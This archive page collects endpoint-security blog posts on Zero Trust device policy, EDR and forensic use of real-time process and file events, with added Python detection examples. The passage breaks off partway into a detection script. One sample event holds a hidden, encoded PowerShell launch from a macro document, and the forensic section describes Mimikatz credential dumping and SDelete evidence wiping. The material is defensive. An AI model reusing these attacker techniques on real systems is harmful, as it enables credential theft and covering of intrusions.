Category Archives: Endpoint security

Zero Trust Deployment Guide for devices

The modern enterprise has an incredible diversity of endpoints accessing their data. This creates a massive attack surface, and as a result, endpoints can easily become the weakest link in your Zero Trust security strategy.

Whether a device is a personally owned BYOD device or a corporate-owned and fully managed device, we want to have visibility into the endpoints accessing our network, and ensure we’re only allowing healthy and compliant devices to access corporate resources. Likewise, we are concerned about the health and trustworthiness of mobile and desktop apps that run on those endpoints. We want to ensure those apps are also healthy and compliant and that they prevent corporate data from leaking to consumer apps or services through malicious intent or accidental means.

Get visibility into device health and compliance

Gaining visibility into the endpoints accessing your corporate resources is the first step in your Zero Trust device strategy. Typically, companies are proactive in protecting PCs from vulnerabilities and attacks, while mobile devices often go unmonitored and without protections. To help limit risk exposure, we need to monitor every endpoint to ensure it has a trusted identity, has security policies applied, and the risk level for things like malware or data exfiltration has been measured, remediated, or deemed acceptable. For example, if a personal device is jailbroken, we can block access to ensure that enterprise applications are not exposed to known vulnerabilities.

  1. To ensure you have a trusted identity for an endpoint, register your devices with Azure Active Directory (Azure AD). Devices registered in Azure AD can be managed using tools like Microsoft Endpoint Manager, Microsoft Intune, System Center Configuration Manager, Group Policy (hybrid Azure AD join), or other supported third-party tools (using the Intune Compliance API + Intune license). Once you’ve configured your policy, share the following guidance to help users get their devices registered—new Windows 10 devices, existing Windows 10 devices, and personal devices.
  2. Once we have identities for all the devices accessing corporate resources, we want to ensure that they meet the minimum security requirements set by your organization before access is granted. With Microsoft Intune, we can set compliance rules for devices before granting access to corporate resources. We also recommend setting remediation actions for noncompliant devices, such as blocking a noncompliant device or offering the user a grace period to get compliant.

Restricting access from vulnerable and compromised devices

Once we know the health and compliance status of an endpoint through Intune enrollment, we can use Azure AD Conditional Access to enforce more granular, risk-based access policies. For example, we can ensure that no vulnerable devices (like devices with malware) are allowed access until remediated, or ensure logins from unmanaged devices only receive limited access to corporate resources, and so on.

  1. To get started, we recommend only allowing access to your cloud apps from Intune-managed, domain-joined, and/or compliant devices. These are baseline security requirements that every device will have to meet before access is granted.
  2. Next, we can configure device-based Conditional Access policies (they live in Azure AD and are also surfaced in the Microsoft Endpoint Manager admin center) to enforce restrictions based on device health and compliance. This allows us to make more granular access decisions and fine-tune the Conditional Access policies to your organization’s risk appetite. For example, we might want to exclude certain device platforms from accessing specific apps.
  3. Finally, we want to ensure that your endpoints and apps are protected from malicious threats. This keeps your data better protected and reduces the chance that users are denied access because of device health or compliance issues. We can integrate data from Microsoft Defender Advanced Threat Protection (ATP), or other Mobile Threat Defense (MTD) vendors, as an information source for device compliance policies and device Conditional Access rules.
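As an added example (not part of the Microsoft guide, and not how Azure AD evaluates policy internally), the following Python models the three steps as one ordered decision function. Writing the rule set out this way is useful when reviewing it for gaps, for example an unmanaged device that is neither blocked nor restricted, or a platform exclusion that is checked after a broader allow. The field names, the device states and the threat-level scale ("secured", "low", "medium", "high", the scale Intune compliance policies use for MTD data) are assumptions documented in the code.

```python
"""Simplified model of device-based Conditional Access decisions.

Added example, not Microsoft code. Device state is assumed to come from Intune
and the threat level from an MTD / Defender ATP integration (None = no agent).
"""
from dataclasses import dataclass
from enum import Enum
from typing import FrozenSet, Optional, Tuple


class Decision(Enum):
    ALLOW = "allow"        # full access
    LIMITED = "limited"    # e.g. browser-only session, downloads blocked
    BLOCK = "block"


# MTD / Defender ATP device threat levels, lowest risk first (assumed scale)
THREAT_ORDER = {"secured": 0, "low": 1, "medium": 2, "high": 3}


@dataclass(frozen=True)
class Device:
    platform: str                       # "windows", "ios", "android", "macos"
    intune_managed: bool                # enrolled in Intune MDM
    compliant: bool                     # meets the Intune compliance policy
    hybrid_joined: bool                 # hybrid Azure AD joined (on-prem domain)
    threat_level: Optional[str] = None  # MTD signal, None when no agent reports


@dataclass(frozen=True)
class Policy:
    app: str
    excluded_platforms: FrozenSet[str] = frozenset()
    max_threat_level: str = "low"         # highest threat level still allowed
    require_threat_signal: bool = False   # block devices with no MTD data
    unmanaged_gets_limited: bool = True   # otherwise unmanaged devices are blocked


def evaluate(device: Device, policy: Policy) -> Tuple[Decision, str]:
    """Return the access decision and the reason, in the order the guide lays out
    the checks: platform exclusions, threat data, then the managed/compliant baseline."""
    # Step 2: platform restrictions for this specific app
    if device.platform in policy.excluded_platforms:
        return Decision.BLOCK, f"{device.platform} is excluded for {policy.app}"
    # Step 3: threat data from MTD / Defender ATP feeds the decision
    if device.threat_level is None:
        if policy.require_threat_signal:
            return Decision.BLOCK, "no threat-defense signal for this device"
    elif THREAT_ORDER[device.threat_level] > THREAT_ORDER[policy.max_threat_level]:
        return Decision.BLOCK, f"threat level {device.threat_level} exceeds {policy.max_threat_level}"
    # Step 1: baseline, compliant Intune-managed OR hybrid-joined (the CA "OR" grant)
    if device.hybrid_joined or (device.intune_managed and device.compliant):
        return Decision.ALLOW, "managed and compliant"
    if device.intune_managed:
        return Decision.BLOCK, "enrolled but noncompliant; remediate before access"
    if policy.unmanaged_gets_limited:
        return Decision.LIMITED, "unmanaged device; restricted session"
    return Decision.BLOCK, "unmanaged device not permitted"


if __name__ == "__main__":
    sharepoint = Policy(app="SharePoint", excluded_platforms=frozenset({"android"}))
    for d in (Device("windows", True, True, False, "secured"),
              Device("windows", True, True, False, "high"),
              Device("ios", False, False, False, None)):
        print(d.platform, evaluate(d, sharepoint))
```

Note the order: a device with a high MTD threat level is blocked even if it is otherwise compliant, which is the "no vulnerable devices until remediated" rule from the section above, and an unmanaged device never reaches the compliance check at all.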

Enforcing security policies on mobile devices and apps

We have two options for enforcing security policies on mobile devices: Intune Mobile Device Management (MDM) and Intune Mobile Application Management (MAM). In both cases, once data access is granted, we want to control what the user does with the data. For example, if a user accesses a document with a corporate identity, we want to prevent that document from being saved in an unprotected consumer storage location or from being shared with a consumer communication or chat app. With Intune MAM policies in place, they can only transfer or copy data within trusted apps such as Office 365 or Adobe Acrobat Reader, and only save it to trusted locations such as OneDrive or SharePoint.

Intune ensures that the device configuration aspects of the endpoint are centrally managed and controlled. Device management through Intune enables endpoint provisioning, configuration, automatic updates, device wipe, or other remote actions. Device management requires the endpoint to be enrolled with an organizational account and allows for greater control over things like disk encryption, camera usage, network connectivity, certificate deployment, and so on.

Mobile Device Management (MDM)

  1. First, using Intune, let’s apply Microsoft’s recommended security settings to Windows 10 devices to protect corporate data (Windows 10 1809 or later required).
  2. Ensure your devices are patched and up to date using Intune—check out our guidance for Windows 10 and iOS.
  3. Finally, we recommend ensuring your devices are encrypted to protect data at rest. Intune can manage a device’s built-in disk encryption across both macOS and Windows 10.

Meanwhile, Intune MAM is concerned with management of the mobile and desktop apps that run on endpoints. Where user privacy is a higher priority, or the device is not owned by the company, app management makes it possible to apply security controls (such as Intune app protection policies) at the app level on non-enrolled devices. The organization can ensure that only apps that comply with its security controls, running on approved devices, can be used to access email or files or browse the web.

With Intune, MAM is possible for both managed and unmanaged devices. For example, a user’s personal phone (which is not MDM-enrolled) may have apps that receive Intune app protection policies to contain and protect corporate data after it has been accessed. Those same app protection policies can be applied to apps on a corporate-owned and enrolled tablet. In that case, the app-level protections complement the device-level protections. If the device is also managed and enrolled with Intune MDM, you can choose not to require a separate app-level PIN if a device-level PIN is set, as part of the Intune MAM policy configuration.

Mobile Application Management (MAM)

  1. To protect your corporate data at the application level, configure Intune MAM policies for corporate apps. MAM policies offer several ways to control access to your organizational data from within apps:
    • Configure data relocation policies like save-as restrictions for saving organization data or restrict actions like cut, copy, and paste outside of organizational apps.
    • Configure access policy settings like requiring a simple PIN for access or blocking managed apps from running on jailbroken or rooted devices.
    • Configure automatic selective wipe of corporate data for noncompliant devices using MAM conditional launch actions.
    • If needed, create exceptions to the MAM data transfer policy to and from approved third-party apps.
  2. Next, we want to set up app-based Conditional Access policies to ensure only approved corporate apps access corporate data.
  3. Finally, using app configuration (appconfig) policies, Intune can help eliminate app setup complexity or issues, make it easier for end users to get going, and ensure better consistency in your security policies. Check out our guidance on assigning configuration settings.


We hope the above helps you deploy and successfully incorporate devices into your Zero Trust strategy. Make sure to check out the other deployment guides in the series by following the Microsoft Security blog. For more information on Microsoft Security Solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Zero Trust Deployment Guide for devices appeared first on Microsoft Security.

Your Network Has Left the Building – How do you secure it?

Your network has left the building. It’s no longer sitting in the server room down the hall where you can keep an eye on it. And it’s no longer safely tucked behind your corporate firewall. Instead, it’s in the cloud. It’s inside your users’ smartphones. And especially now, your corporate network is in people’s homes.

Today’s security teams have to mind various areas of their network and cloud infrastructure, remote users and endpoints, and applications running everywhere in order to remain secure. And as soon as new technology is developed or widely used, attackers find ways to take advantage of it – making security vigilance even more critical.

In our recent 2020 CISO Benchmark Study, we asked security professionals which areas of their environment they find most challenging to defend. According to the study:

  • 52% find mobile devices and data stored in the public cloud very or extremely challenging to defend
  • 50% find private cloud infrastructure very or extremely difficult to defend
  • 41% find data centers and network infrastructure very or extremely difficult to defend
  • 39% say they are really struggling to secure applications

While the moves to mobile and cloud seem to pose the biggest challenges, the data shows that the rest of your security concerns haven’t gone away either.

So how do you do it all?

How do you protect some of the newer technologies that have become part of your environment while still paying attention to things like your traditional data center and network infrastructure to make sure they are not breached? And how do you do this amidst unprecedented remote worker hurdles and a dramatic shortage of skilled cybersecurity professionals? Here are some examples of how Cisco can help you protect the challenge areas outlined above.

Endpoint

In order for security to work, it has to work across all the devices your employees are using. Cisco’s endpoint security combines a variety of security technologies to make sure your users’ mobile devices are protected, and in turn, do not compromise the corporate network. For example, Cisco AnyConnect and Cisco Duo enable users to securely access your network or applications using managed or unmanaged, mobile or traditional devices. And Cisco Umbrella and Cisco AMP for Endpoints defend these devices against threats from the first line to the last line of defense.

In response to current challenges, we have also launched the Cisco Secure Remote Worker solution to help organizations address the recent rise in remote and mobile workers. The intent is to better enable IT and security teams to quickly provision remote workers without sacrificing cybersecurity. The offering includes extended free trials and expanded usage counts to help alleviate today’s tremendous IT and security demands. Learn more about how this offering can enable secure access for a distributed workforce and help you defend against malware across the network, endpoints, cloud, and applications.

Cloud

Cisco’s cloud security protects your assets and data in the cloud from multiple angles. It helps secure private, public, and hybrid clouds to facilitate your transition to a multicloud environment. With Cisco’s cloud edge security, you can: 1) secure cloud access, 2) protect cloud users, data, and applications, and 3) extend in-depth visibility and threat detection into the cloud.

Data Center

Today’s application workloads are more dynamic, moving across on-prem and multicloud environments. This requires a new strategy for data center security that can protect workloads wherever they go. The Cisco Secure Data Center solution provides several layers of security through in-depth visibility, segmentation, and threat protection. The solution brings together key technologies that let you see, segment, and secure your data as it travels across your environment and into the cloud.

Applications

Related to data center security is application security. Cisco’s application security brings continuous, adaptive protection closer to your applications to give you greater insight and control over what is running in your environment. The security follows your applications to ensure protection without hindering productivity and innovation. This allows you to understand application behaviors, automate micro-segmentation, and use security analytics to speed detection.

Network

Perhaps the trickiest area to summarize is network security due to the ever-expanding components that make up today’s “network.” You need a next-generation firewall that can keep up with your expanding infrastructure and sophisticated attackers. You need a way for authorized users to securely connect to the network. And once they’re logged in, you need multiple layers of protection to prevent them from abusing their privileges or being compromised by malware.

Bringing it all together

While we secure many areas of the corporate environment, we don’t do so in silos. Our security products all work together – and with the customer’s infrastructure, including third-party technologies – to provide more cohesive, automated defenses. By taking a platform approach to security, Cisco SecureX results in greater visibility, collaboration, and protection across all threat vectors, access points, and areas of your infrastructure. This reduces complexity while enabling a zero-trust security strategy.

For more information

Explore our entire security portfolio and review the 2020 CISO Benchmark Report for more information on how to protect various areas of your environment.

This post is part of a series covering topics and data from our 2020 CISO Benchmark Report. Read previous posts here, and be sure to check back soon for more!

The post Your Network Has Left the Building – How do you secure it? appeared first on Cisco Blogs.

What Is EDR and Why Is It Important?

Oftentimes, your organization’s endpoints become the key entry points for attackers. With the growth of workplace mobility and employees connecting to the Internet from off-site endpoints across the globe, it should come as no surprise that devices are increasingly exposed. Without proper protection in place, attackers can take advantage of any existing vulnerability. This is why security tools that go beyond traditional firewalls and antivirus have become a top priority for organizations large and small. EDR (short for Endpoint Detection and Response) is the term that covers threat hunting, prevention, and detection tools on the endpoint, and it has become the gold standard in cybersecurity.

In this article, I will explain what Endpoint Detection and Response (EDR) is and why it has become a vital part of your business.

Cybercriminals do their utmost to target and attack your company’s endpoints, for various reasons. They might want to exfiltrate your data or hold it for ransom, take over your machines, enlist them in a botnet to conduct DDoS attacks, and much more.

What does EDR mean?

The term EDR stands for Endpoint Detection and Response (or Endpoint Threat Detection & Response). It was coined in 2013 by Anton Chuvakin, former VP and security analyst at Gartner, now security product strategist at Google:

“After a long agonizing process that involved plenty of conversations with vendors, enterprises and other analysts, I have settled on this generic name for the tools primarily focused on detecting and investigating suspicious activities (and traces of such) other problems on hosts/endpoints: Endpoint Threat Detection & Response.” Anton Chuvakin, Gartner’s blog

Essentially, Endpoint Detection and Response (EDR) systems were created to detect and actively respond to sophisticated malware and cyber attacks. EDR solutions record suspicious patterns of activity that can then be investigated. As implied by the name, these tools are designed specifically for endpoints (rather than the network).

Why is EDR important?

Compared to traditional security solutions, EDR provides enhanced visibility into your endpoints and allows for faster response time.

Furthermore, EDR tools detect and protect your organization from advanced forms of malware (such as polymorphic malware), APTs, phishing payloads, and so on. Many EDR solutions also use machine-learning and behavior-based models to classify previously unseen malware by what it does rather than by a known signature.

In essence, if a file behaves maliciously (in ways similar to already known malware families), an EDR can flag it even though no signature matches.

EDR vs. Antivirus – What’s the difference?

In the past, a traditional Antivirus solution may have sufficed to cover the protection of your endpoints. But as malware evolved into more advanced and pervasive forms, it became clear that Antivirus was no longer enough and that prevention and detection mechanisms needed to keep up with the ever-evolving threatscape.

EDR solutions have several unique features and benefits which conventional Antivirus programs do not deliver.

Compared to the newer EDR systems, traditional antivirus solutions are simpler in nature and are best seen as one component of EDR.

Normally, antivirus tools accomplish basic tasks such as scanning, detection, and malware removal.

On the other hand, EDR goes beyond traditional antivirus, which relies mostly on signature-based threat detection. EDR tools are much broader in scope and, in many offerings, bundle multiple security layers such as attack blocking, patching, exploit blocking, a firewall, whitelisting/blacklisting, full category-based blocking, admin rights management, and a next-gen antivirus.

EDR security solutions are therefore a better fit for today’s businesses, since traditional antivirus on its own no longer provides adequate protection.
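To make the "signature-based" versus "behavior-based" distinction concrete, here is an added example (not from the post or from any vendor’s product) in Python: a hash blocklist check of the kind a classic antivirus engine performs, next to a behavioral rule that inspects the process tree instead of the file. Changing a single byte of the sample defeats the hash check; the behavioral rule fires on what the process does (an Office application spawning a command interpreter that launches an encoded PowerShell command) and is unaffected by the change. The sample bytes, hashes and process events are constructed for the example.

```python
"""Signature matching versus a behavioural rule (added example, constructed data)."""
import hashlib
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed "known malware" bytes and the blocklist a signature engine keeps.
SAMPLE_MALWARE = b"MZ\x90\x00" + b"constructed-dropper-sample"
KNOWN_BAD_SHA256 = {sha256_hex(SAMPLE_MALWARE)}


def signature_verdict(file_bytes: bytes) -> bool:
    """Classic antivirus logic: the file is bad only if its hash is already known."""
    return sha256_hex(file_bytes) in KNOWN_BAD_SHA256


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    ppid: int
    image: str       # executable file name, lower case
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def behavioural_verdict(events: Iterable[ProcessEvent]) -> List[Tuple[int, str, bool]]:
    """Flag every shell whose parent or grandparent is an Office application.
    Returns (pid, office ancestor image, encoded PowerShell command seen).
    The rule never looks at the binary, so repacking the payload does not evade it."""
    by_pid: Dict[int, ProcessEvent] = {e.pid: e for e in events}
    hits = []
    for e in by_pid.values():
        if e.image not in SHELLS:
            continue
        ancestor, depth = by_pid.get(e.ppid), 0
        while ancestor is not None and depth < 2:   # covers winword -> cmd -> powershell
            if ancestor.image in OFFICE_APPS:
                lc = e.cmdline.lower()
                hits.append((e.pid, ancestor.image, "-enc" in lc or "-encodedcommand" in lc))
                break
            ancestor, depth = by_pid.get(ancestor.ppid), depth + 1
    return hits


# Constructed process tree: explorer -> winword (macro document) -> cmd -> powershell -enc
SAMPLE_EVENTS = [
    ProcessEvent(1, 0, "explorer.exe", "explorer.exe"),
    ProcessEvent(2, 1, "winword.exe", r'"C:\Program Files\Microsoft Office\WINWORD.EXE" invoice.docm'),
    ProcessEvent(3, 2, "cmd.exe", "cmd.exe /c start /b powershell -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent(4, 3, "powershell.exe", "powershell -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent(5, 1, "cmd.exe", "cmd.exe /c dir"),   # user-launched shell, benign
]

if __name__ == "__main__":
    print("hash match, original:", signature_verdict(SAMPLE_MALWARE))
    print("hash match, one byte appended:", signature_verdict(SAMPLE_MALWARE + b"\x00"))
    print("behavioural hits:", behavioural_verdict(SAMPLE_EVENTS))
```

The benign `cmd.exe /c dir` launched from Explorer is not flagged, which is the other half of what a behavioral rule has to get right: the ancestry check, not the mere presence of a shell, is the signal.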


The main characteristics and benefits of EDR

The features of Endpoint Detection and Response tools can vary from vendor to vendor, yet we can notice a few main characteristics that define EDR and that are considered essential. Each tool can have a certain degree of sophistication, but below I would like to point out the five major characteristics of EDR:

#1. Integration with multiple tools

EDR solutions typically come as multiple tools or layers that feed intelligence into each other to protect your organization from multiple angles.

#2. Alerts, reporting, and a unified overview of your environment

A dashboard that provides access to your endpoints’ protection status should be a mandatory feature of any EDR solution. At the same time, you should be able to receive timely alerts and have the capability to identify and monitor endpoint security threats and vulnerabilities.

Also, running reports for compliance purposes is a crucial aspect of all EDR tools.

#3.  Advanced response capabilities and automation

An EDR technology should provide you with specialized tools for assessing and reacting to security incidents, including prevention, detection, threat intelligence, and forensics. At the same time, automation capabilities are essential.

#4. Global availability

EDR should allow you not to be dependent on platform constraints and be able to manage your environment wherever you or your teams are, at the time of your choosing.

#5. Prevention

Last in order but not in importance, an effective EDR technology must offer prevention methods and adaptive protection against next-generation malware, based on behavioral analysis of incoming and outgoing traffic in your organization, in order to prevent and mitigate attacks that cannot be detected by reactive solutions like an antivirus.

Why Is Heimdal™’s EDR technology the best on the market? Introducing E-PDR, the next-gen approach to EDR.

We’ve combined an Endpoint Protection Platform (EPP) with Endpoint Detection and Response (EDR) and achieved what we consider to be the gold standard in cybersecurity: E-PDR (Endpoint Prevention, Detection, and Response).

Below I will discuss the numerous ways in which you can benefit from our E-PDR technology, superior to other existing EDR tools.

First of all, Heimdal™’s EDR brings you real-time proactive security via DNS filtering, smart threat hunting, proactive behavioral detection, automated patch management, a next-gen antivirus, and a module for automated admin rights escalation/de-escalation procedures. Thus, we deliver a layered security approach within a single and lightweight agent. Our customers get access to next-gen endpoint threat prevention and protection from existing and undiscovered threats, plus a market-leading detection rate and compliance, all in one package.


By combining Thor Foresight Enterprise and Thor Vigilance Enterprise you will obtain proactive IOCs and enhanced IOAs and gain a unique EDR ability to mitigate even concealed or unknown malware.

Secondly, our dashboard always provides you with notifications and warnings for all active clients. It offers real-time threat and status reporting, delivered at the interval of your choosing. Your data is graphed and scaled daily, weekly, or monthly and can also be integrated into a SIEM via API. The Heimdal™ Security Unified Threat Dashboard (UTD) stores the entire history throughout your customer lifecycle and helps you perform compliance audits and risk assessments. Alongside weekly reports, data exports, e-mail alerts, and built-in data drill-down, the Heimdal™ UTD offers a powerful yet simple way to manage your environment.

Our platform also enables you to define policies for each of your components in great detail. For example, you can refine the blacklisting of websites, files, processes, or patches per Active Directory group of your Heimdal™ environment. This gives you the powerful option to individually tailor your IT environment and create policies that fit your exact needs across the Active Directory groups in your organization. Once configured, the Heimdal™ deployment is simple and can happen through any MSI deployment tool.

Thirdly, because we’ve taken into consideration the evolving needs of the global enterprise, our E-PDR technology works anytime and anywhere in the world, for both on-site and remote work set-ups.

Last but not least, our multi-layered security suite, combined into our E-PDR system, comes in a user-friendly and easy-to-deploy agent that is extremely lightweight on your systems and will become a major time-saver for your sysadmins.


No matter which EDR solution you end up choosing, make sure it can be scaled up and down and that it fits your organization’s needs.

Should you want to try out our EDR technology, please register on the website or contact us as


The post What Is EDR and Why Is It Important? appeared first on Heimdal Security Blog.

Using Real-Time Events in Investigations

To understand what a threat actor did on a Windows system, analysts often turn to the tried and true sources of historical endpoint artifacts such as the Master File Table (MFT), registry hives, and Application Compatibility Cache (AppCompat). However, these evidence sources were not designed with detection or incident response in mind; crucial details may be omitted or cleared through anti-forensic methods. By looking at historical evidence alone, an analyst may not see the full story.

Real-time events can be thought of as forensic artifacts specifically designed for detection and incident response, implemented through Endpoint Detection and Response (EDR) solutions or enhanced logging implementations like Sysmon. During active-attacker endpoint investigations, FireEye Mandiant has found real-time events to be useful in filling in the gaps of what an attacker did. These events record different types of system activity such as process execution, file write activity, network connections, and more.

During incident response engagements, Mandiant uses FireEye Endpoint Security to track endpoint system events in real-time. This feature allows investigators to track an attacker on any system by alerting on and reviewing these real-time events. An analyst can use our solution’s built-in Audit Viewer or Redline to review real-time events.

Let’s look at some examples of Windows real-time events available on our solution and how they can be leveraged during an investigation. Let’s assume the account TEST-DOMAIN\BackupAdmin was an inactive Administrator account compromised by an attacker. Please note the examples provided in this post are based on real-time events observed during engagements but have been recreated or altered to preserve client confidentiality.

Process Execution Events

There are many historical process execution artifacts including AppCompat, AmCache, WMI CCM_RecentlyUsedApps, and more. A single artifact rarely covers all the useful details relating to a process's execution, but real-time process execution events change that. Our solution’s real-time process execution events record execution time, full process path, process identification number (PID), parent process path, parent PID, user, command line arguments, and even the process MD5 hash.

Table 1 provides an example of a real-time process execution event recorded by our solution.

Timestamp (UTC): 2020-03-10 16:40:58.235
Sequence Number: [not preserved in this copy]
PID: 9392
Process Path: C:\Windows\Temp\legitservice.exe
Parent PID: 9103
Parent Process Path: C:\Windows\System32\cmd.exe
Username: TEST-DOMAIN\BackupAdmin
Process Command Line: "C:\Windows\Temp\legitservice.exe"  -b -m
Process MD5 Hash: a823bc31395539816e8e4664e884550f

Table 1: Example real-time process execution event

Based on this real-time process execution event, the process C:\Windows\System32\cmd.exe with PID 9103 executed the file C:\Windows\Temp\legitservice.exe with PID 9392 and the MD5 hash a823bc31395539816e8e4664e884550f. This new process used the command line arguments -b -m under the user context of TEST-DOMAIN\BackupAdmin.

We can compare this real-time event with what an analyst might see in other process execution artifacts. Table 2 provides an example AppCompat entry for the same executed process. Note the recorded timestamp is the last modified time of the file, not the process start time.

File Last Modified (UTC): 2020-03-07 23:48:09
File Path: C:\Windows\Temp\legitservice.exe
Executed Flag: [not preserved in this copy]

Table 2: Example AppCompat entry

Table 3 provides an example AmCache entry. Note the last modified time of the registry key can usually be used to determine the process start time, and this artifact includes the SHA1 hash of the file.

Registry Key Last Modified (UTC): 2020-03-10 16:40:58
File Path: C:\Windows\Temp\legitservice.exe
File SHA1 Hash: [not preserved in this copy]

Table 3: Example AmCache entry

Table 4 provides an example Windows Event Log process creation event (Security log event ID 4688). Note this artifact records PIDs in hexadecimal notation, includes details about the parent process, and has a field for the process command line. In this example the command line is empty because command line logging is disabled by default; it is turned on with the Group Policy setting "Include command line in process creation events" (Computer Configuration > Administrative Templates > System > Audit Process Creation), and Mandiant rarely sees this policy enabled by clients on investigations.

Write Time (UTC): 2020-03-10 16:40:58
Log: Microsoft Windows security
Message:

A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Target Subject:
      Security ID:             NULL SID
      Account Name:            -
      Account Domain:          -
      Logon ID:                0x0

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\Windows\Temp\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\Windows\System32\cmd.exe
      Process Command Line:    

Table 4: Example Windows event log process creation event

If we combine the evidence available in AmCache with a fully detailed Windows Event Log process creation event, we could match the evidence available in the real-time event except for a small difference in file hash types.
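Doing that reconciliation by hand means converting the hexadecimal PIDs and comparing field by field, so here it is as a small added Python example (not FireEye Endpoint Security code). The 4688 message is the one from Table 4 and the real-time fields are those from Table 1; the parser converts the event log’s hex PIDs to decimal, then the reconcile step reports which shared fields disagree and which fields the event log simply does not carry here (the empty command line; the event log also has no file hash at all).

```python
"""Parse a Security 4688 message and reconcile it with a real-time process event.
Added example; the 4688 text is the constructed one shown in Table 4."""
import re
from typing import Dict

# Backslashes are doubled only because this is a Python string literal.
EVENT_4688_TEXT = """A new process has been created.

Creator Subject:
      Security ID:             TEST-DOMAIN\\BackupAdmin
      Account Name:            BackupAdmin
      Account Domain:          TEST-DOMAIN
      Logon ID:                0x6D6AD

Target Subject:
      Security ID:             NULL SID
      Account Name:            -
      Account Domain:          -
      Logon ID:                0x0

Process Information:
      New Process ID:          0x24b0
      New Process Name:        C:\\Windows\\Temp\\legitservice.exe
      Token Elevation Type:    %%1938
      Mandatory Label:         Mandatory Label\\Medium Mandatory Level
      Creator Process ID:      0x238f
      Creator Process Name:    C:\\Windows\\System32\\cmd.exe
      Process Command Line:
"""

# Real-time process execution event, values from Table 1 of the post
REALTIME_EVENT = {
    "pid": 9392,
    "process_path": r"C:\Windows\Temp\legitservice.exe",
    "parent_pid": 9103,
    "parent_process_path": r"C:\Windows\System32\cmd.exe",
    "username": r"TEST-DOMAIN\BackupAdmin",
    "command_line": r'"C:\Windows\Temp\legitservice.exe"  -b -m',
    "md5": "a823bc31395539816e8e4664e884550f",
}

FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?):\s*(.*?)\s*$")


def parse_4688(text: str) -> Dict[str, Dict[str, object]]:
    """Parse the 4688 message into {section: {field: value}}. PID fields are
    converted from the event log's hexadecimal notation to decimal so they
    compare directly with other artifacts."""
    out: Dict[str, Dict[str, object]] = {}
    section = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.endswith(":") and not line.startswith(" "):   # "Creator Subject:" etc.
            section = line[:-1]
            out[section] = {}
            continue
        m = FIELD_RE.match(line)
        if m and section is not None:
            key, value = m.group(1), m.group(2)
            out[section][key] = int(value, 16) if key.endswith("Process ID") else value
    return out


def reconcile(evt4688: Dict[str, Dict[str, object]], realtime: dict) -> dict:
    """Compare the fields both sources carry; list mismatches and the fields
    the event log leaves empty or does not have."""
    pi, cs = evt4688["Process Information"], evt4688["Creator Subject"]
    pairs = {
        "pid": (pi["New Process ID"], realtime["pid"]),
        "process_path": (pi["New Process Name"], realtime["process_path"]),
        "parent_pid": (pi["Creator Process ID"], realtime["parent_pid"]),
        "parent_process_path": (pi["Creator Process Name"], realtime["parent_process_path"]),
        "username": (cs["Security ID"], realtime["username"]),
    }
    mismatches = {k: v for k, v in pairs.items() if v[0] != v[1]}
    missing = [f for f in ("Process Command Line",) if not pi.get(f)]
    if "File Hash" not in pi:          # 4688 never records a hash of the image
        missing.append("File Hash")
    return {"mismatches": mismatches, "missing_in_4688": missing}


if __name__ == "__main__":
    parsed = parse_4688(EVENT_4688_TEXT)
    print(parsed["Process Information"])
    print(reconcile(parsed, REALTIME_EVENT))
```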

File Write Events

An attacker may choose to modify or delete important evidence. If an attacker uses a file shredding tool like Sysinternals SDelete, it is unlikely the analyst will recover the original contents of the file. Our solution’s real-time file write events are incredibly useful in situations like this because they record the MD5 hash of the files written and partial contents of the file. File write events also record which process created or modified the file in question.

Table 5 provides an example of a real-time file write event recorded by our solution.

Timestamp (UTC): 2020-03-10 16:42:59.956
Sequence Number: [not preserved in this copy]
PID: [not preserved in this copy]
Process Path: C:\Windows\Temp\legitservice.exe
Device Path: [not preserved in this copy]
File Path: C:\Windows\Temp\WindowsServiceNT.log
File MD5 Hash: 30a82a8a864b6407baf9955822ded8f9
Num Bytes Seen Written: [not preserved in this copy]
Event reason: File closed
Base64 Encoded Data At Lowest Offset: [not preserved in this copy]
Text At Lowest Offset: Creating 'WindowsServiceNT.log' logfile : OK....mimikatz(command

Table 5: Example real-time file write event

Based on this real-time file write event, the malicious executable C:\Windows\Temp\legitservice.exe wrote the file C:\Windows\Temp\WindowsServiceNT.log to disk with the MD5 hash 30a82a8a864b6407baf9955822ded8f9. Since the real-time event recorded the beginning of the written file, we can determine the file likely contained Mimikatz credential harvester output which Mandiant has observed commonly starts with OK....mimikatz.

If we investigate a little later, we’ll see a process creation event for C:\Windows\Temp\taskassist.exe with the MD5 file hash 2b5cb081721b8ba454713119be062491, followed by several file write events for this process, summarized in Table 6.

Timestamp (UTC)
2020-03-10 16:53:42.351
2020-03-10 16:53:42.351
2020-03-10 16:53:42.351
2020-03-10 16:53:42.351
2020-03-10 16:53:42.382
2020-03-10 16:53:42.382
2020-03-10 16:53:42.382

Table 6: Example timeline of SDelete file write events (the File Path and File Size columns were not preserved in this copy)

Admittedly, this activity may seem strange at first glance. If we research its file hash, we find the process is actually SDelete masquerading as C:\Windows\Temp\taskassist.exe. As part of its secure deletion process, SDelete renames the file 26 times, each time replacing every character of the file name with a successive alphabetic character, before finally deleting it.
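That rename pattern is distinctive enough to hunt for directly in a stream of file events, so here is an added Python example (not FireEye/Mandiant code) that does so. The rename event schema (timestamp, PID, process path, old path, new path) is an assumption, since the post does not show the exact fields of a rename record; the SDelete naming behaviour follows the Sysinternals documentation, where each of the 26 renames replaces every character of the name with the same letter, starting at A, so WindowsServiceNT.log becomes AAAAAAAAAAAAAAAA.AAA, then BBBBBBBBBBBBBBBB.BBB, and so on. All events, including the PID of the masquerading taskassist.exe, are constructed.

```python
"""Detect SDelete-style rename chains in file rename events (added example)."""
import re
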